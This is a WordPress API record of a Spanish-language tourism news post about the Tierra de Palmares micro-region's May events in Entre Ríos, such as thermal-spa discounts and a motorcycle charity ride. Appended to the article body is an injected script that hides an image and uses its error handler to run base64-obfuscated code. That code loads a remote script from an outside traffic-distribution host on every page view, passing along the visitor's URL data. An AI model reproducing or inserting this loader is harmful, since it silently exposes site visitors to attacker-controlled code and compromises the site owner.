{"id":9534,"date":"2025-05-07T08:59:12","date_gmt":"2025-05-07T11:59:12","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9534"},"modified":"2025-08-13T15:28:55","modified_gmt":"2025-08-13T18:28:55","slug":"la-microrregion-tierra-de-palmares-presento-la-experiencia-turistica-para-mayo","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9534","title":{"rendered":"La Microrregi\u00f3n Tierra de Palmares present\u00f3 la experiencia tur\u00edstica para mayo"},"content":{"rendered":"\n<p><strong><em>La Secretar\u00eda de Turismo de Entre R\u00edos acompa\u00f1\u00f3 la presentaci\u00f3n de la propuesta tur\u00edstica de la Microrregi\u00f3n Tierra de Palmares, que se realiz\u00f3 este martes en Paran\u00e1. En el encuentro se destac\u00f3 el trabajo conjunto entre municipios, el fortalecimiento de los productos de temporada baja y el relanzamiento del Pasaporte Termal.<\/em><\/strong><\/p>\n\n\n\n<p>El showroom cont\u00f3 con la presencia del secretario de Turismo de Entre R\u00edos, Jorge Satto, quien valor\u00f3 el modelo de trabajo por microrregiones como \u201cuna herramienta que permite una gesti\u00f3n m\u00e1s ordenada, m\u00e1s productiva y m\u00e1s visible del turismo entrerriano\u201d. La Microrregi\u00f3n Tierra de Palmares, conformada por municipios de los departamentos Col\u00f3n y San Salvador, present\u00f3 una agenda que incluye experiencias termales, culturales y naturales, con beneficios especiales para quienes visiten el destino en mayo.<\/p>\n\n\n\n<p>Uno de los principales anuncios fue el relanzamiento, por tercer a\u00f1o consecutivo, del Pasaporte Termal, una herramienta que promueve la circulaci\u00f3n de turistas entre los complejos termales de la regi\u00f3n. A partir del 5 de mayo, quienes visiten las termas de Col\u00f3n, San Jos\u00e9 o Villa Elisa podr\u00e1n acceder a un 50% de descuento en el segundo y tercer parque que visiten, adem\u00e1s de un 10% en servicios internos.<\/p>\n\n\n\n<p>Durante el encuentro, el intendente de Col\u00f3n y presidente de la Mancomunidad Tierra de Palmares, Jos\u00e9 Luis Walser, se\u00f1al\u00f3 que \u201cel trabajo conjunto entre localidades permiti\u00f3 dise\u00f1ar herramientas que atienden las demandas de los visitantes y potencian los atractivos de toda la microrregi\u00f3n\u201d. Adem\u00e1s, subray\u00f3 la importancia de sostener el flujo tur\u00edstico durante todo el a\u00f1o, especialmente en meses considerados de baja temporada.<\/p>\n\n\n\n<p>Entre las acciones previstas, se anunci\u00f3 la realizaci\u00f3n del Foro de Termalismo y Enoturismo en la ciudad de San Jos\u00e9, del 15 al 17 de mayo. Este evento buscar\u00e1 integrar saberes y estrategias entre referentes del sector p\u00fablico, privado y acad\u00e9mico, con el foco puesto en la innovaci\u00f3n y la sustentabilidad de estos dos productos claves para Entre R\u00edos.<\/p>\n\n\n\n<p>Otra de las propuestas destacadas es la edici\u00f3n 2025 del Distinguished Gentleman&#8217;s Ride, que se llevar\u00e1 a cabo el 18 de mayo con epicentro en Col\u00f3n. Esta actividad internacional, que re\u00fane motociclistas cl\u00e1sicos y vintage para visibilizar causas sociales, ser\u00e1 una oportunidad para posicionar la microrregi\u00f3n como anfitriona de eventos de car\u00e1cter global.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85742_www.entrerios.tur_.ar_.jpeg\"><img decoding=\"async\" width=\"1015\" height=\"679\" data-id=\"9535\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85742_www.entrerios.tur_.ar_.jpeg\" alt=\"\" class=\"wp-image-9535\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85742_www.entrerios.tur_.ar_.jpeg 1015w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85742_www.entrerios.tur_.ar_-300x201.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85742_www.entrerios.tur_.ar_-768x514.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85742_www.entrerios.tur_.ar_-696x466.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85742_www.entrerios.tur_.ar_-628x420.jpeg 628w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85742_www.entrerios.tur_.ar_-320x214.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85742_www.entrerios.tur_.ar_-480x321.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85742_www.entrerios.tur_.ar_-800x535.jpeg 800w\" sizes=\"(max-width: 1015px) 100vw, 1015px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85551_www.entrerios.tur_.ar_.jpeg\"><img decoding=\"async\" width=\"1021\" height=\"676\" data-id=\"9538\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85551_www.entrerios.tur_.ar_.jpeg\" alt=\"\" class=\"wp-image-9538\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85551_www.entrerios.tur_.ar_.jpeg 1021w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85551_www.entrerios.tur_.ar_-300x199.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85551_www.entrerios.tur_.ar_-768x508.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85551_www.entrerios.tur_.ar_-696x461.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85551_www.entrerios.tur_.ar_-634x420.jpeg 634w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85551_www.entrerios.tur_.ar_-320x212.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85551_www.entrerios.tur_.ar_-480x318.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85551_www.entrerios.tur_.ar_-800x530.jpeg 800w\" sizes=\"(max-width: 1021px) 100vw, 1021px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85516_www.entrerios.tur_.ar_.jpeg\"><img decoding=\"async\" width=\"1015\" height=\"678\" data-id=\"9537\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85516_www.entrerios.tur_.ar_.jpeg\" alt=\"\" class=\"wp-image-9537\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85516_www.entrerios.tur_.ar_.jpeg 1015w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85516_www.entrerios.tur_.ar_-300x200.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85516_www.entrerios.tur_.ar_-768x513.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85516_www.entrerios.tur_.ar_-696x465.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85516_www.entrerios.tur_.ar_-629x420.jpeg 629w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85516_www.entrerios.tur_.ar_-320x214.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85516_www.entrerios.tur_.ar_-480x321.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/05\/Captura-de-pantalla_7-5-2025_85516_www.entrerios.tur_.ar_-800x534.jpeg 800w\" sizes=\"(max-width: 1015px) 100vw, 1015px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>Participaron del showroom autoridades y representantes del sector tur\u00edstico de los municipios involucrados, entre ellos el secretario de Turismo y Cultura de Col\u00f3n, Federico Escher; el coordinador de Turismo de San Jos\u00e9, Mat\u00edas Rodr\u00edguez; el responsable comercial de Termas Villa Elisa, Fernando Graziani; y el gerente de Termas Col\u00f3n, Sebasti\u00e1n Garc\u00eda.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.entrerios.tur.ar\/noticias\/la-microrregi%C3%B3n-tierra-de-palmares-present%C3%B3-la-experiencia-tur%C3%ADstica-para-mayo\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" width=\"426\" height=\"102\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-web_8-11-2024_111525_www.entrerios.tur_.ar_.jpeg\" alt=\"\" class=\"wp-image-8896\" style=\"width:240px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-web_8-11-2024_111525_www.entrerios.tur_.ar_.jpeg 426w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-web_8-11-2024_111525_www.entrerios.tur_.ar_-300x72.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-web_8-11-2024_111525_www.entrerios.tur_.ar_-320x77.jpeg 320w\" sizes=\"(max-width: 426px) 100vw, 426px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Secretar\u00eda de Turismo de Entre R\u00edos acompa\u00f1\u00f3 la presentaci\u00f3n de la propuesta tur\u00edstica de la Microrregi\u00f3n Tierra de Palmares, que se realiz\u00f3 este martes en Paran\u00e1. En el encuentro se destac\u00f3 el trabajo conjunto entre municipios, el fortalecimiento de los productos de temporada baja y el relanzamiento del Pasaporte Termal. El showroom cont\u00f3 con [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9535,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[30],"tags":[],"class_list":["post-9534","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-temas-relacionados"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9534","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9534"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9534\/revisions"}],"predecessor-version":[{"id":9932,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9534\/revisions\/9932"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9535"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9534"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9534"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9534"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}